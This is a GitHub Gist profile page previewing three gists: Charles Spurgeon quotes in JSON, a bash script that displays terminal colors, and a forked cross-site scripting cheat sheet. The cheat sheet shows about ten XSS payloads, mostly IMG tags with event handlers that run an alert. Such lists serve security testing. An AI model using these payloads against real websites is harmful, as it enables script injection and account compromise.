Skip to content

Instantly share code, notes, and snippets.

View myesua's full-sized avatar

Joshua O myesua

View GitHub Profile
@myesua
myesua / CSquotes.json
Last active July 11, 2022 11:50
Quotes from Charles H. Spurgeon
{
"quotes": [
{
"quote": "…the best “apology” for the gospel is to let the gospel out. Never mind defending Deuteronomy or the whole of the Pentateuch. Preach Jesus Christ and him crucified. The Lion of the tribe of Judah will soon drive away all his adversaries.",
"author": "Charles Spurgeon"
},
{
"quote": "The heart of Christ became like a reservoir in the midst of the mountains. All the tributary streams of iniquity, and every drop of the sins of his people, ran down and gathered into one vast lake, deep as hell and shoreless as eternity. All these met, as it were, in Christ's heart, and he endured them all.",
"author": "Charles Spurgeon"
@myesua
myesua / colors
Created May 19, 2022 09:22 — forked from dtmilano/colors
Shows terminal colors
#! /bin/bash
n=32
arg=setaf
text='Hello World! This is %s %d'
_help()
{
printf 'usage: %s [--help|-H] [--16] [--256] [-t|--tiny] [--background|-b]\n' "$(basename $0)"
exit 0
@myesua
myesua / xss_vectors.txt
Created March 11, 2022 03:09 — forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">